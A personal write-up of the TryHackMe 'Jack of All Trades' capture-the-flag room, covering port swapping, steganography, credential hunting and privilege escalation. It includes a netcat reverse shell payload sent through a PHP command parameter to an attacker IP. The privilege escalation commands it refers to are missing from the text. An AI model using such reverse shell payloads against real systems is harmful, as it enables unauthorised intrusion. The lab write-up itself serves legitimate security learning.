THM - Jack of All Trades
Introduction
Boot-to-root originally designed for Securi-Tay 2020.
Jack is a man of a great many talents. The zoo has employed him to capture the penguins due to his years of penguin-wrangling experience, but all is not as it seems… We must stop him! Can you see through his facade of a forgetful old toymaker and bring this lunatic down?
Goodo. It’s easy rated. Let’s begin.
Ports
nmap says we’ve got two ports: 22 and 80. So that’s SSH and HTTP respectively, right? Bzzzt. When I visited the website (defaulting to port 80) Firefox said:
SSH-2.0-OpenSSH_6.7p1 Debian-5
So that’s no good. Seems like Jack is tricky and has swapped his ports around. Okay then, does Firefox like http://10.10.14.31:22 ?
Actually, no. It says:
This address is restricted
This address uses a network port which is normally used for purposes other than Web browsing. Firefox has canceled the request for your protection.
In order to fix that, we have to go to about:config and add the string:
network.security.ports.banned.override with the value 22
Now we’re in.
Website
On the website we find a little bit of text and a few images, one of which is called stego. Hmm. Also in the page source we have a base64 encoded comment, which reveals a password. We can use the password on the stego file:
root@kali:/opt/tryhackme/jack# steghide extract -sf stego.jpg
And this gives us a message that says we’re looking in the wrong image. Lol. The one we want is actually the header image, and that gives us some more credentials, which we can enter at /recovery.php - a page we learned about in the page source of index.html.
/recovery.php
This leads us to a page at http://10.10.14.31:22/nnxhweOV/index.php, which has the message:
GET me a ‘cmd’ and I’ll run it for you Future-Jack.
So this is a little script to run PHP commands, eg:
http://10.10.14.31:22/nnxhweOV/index.php?cmd=whoami
With this we can get a shell, using:
/nnxhweOV/index.php?cmd=nc%20-e%20/bin/sh%2010.9.10.123%201234
On the box
Once we’re in as www-data we quickly find a file called jacks_password_list that contains a series of potential passwords. We can work through these until we find one that works for su jack. This also works for SSH if we want to go that way. Once we’ve escalated to jack, we get the user flag.
Privesc
As usual I ran linpeas, and it highlighted:
That’s a bit unusual. And in fact it’s our method, we can just do:
So there we go. We could also read /etc/shadow with this and grab the root hash if we wanted it.
Footnote
Since I last wrote something I also completed the rooms Overpass 2 and Tartarus, but I haven’t written them up. I may do so at some point, I’m not sure. I’ve also had a crack at Anonymous Playground and gotten the first flag, but the second flag requires a buffer overflow. That’s something that’s been on my radar, but which I haven’t learned about yet. So that’s the topic de jour and it’s my focus at the moment.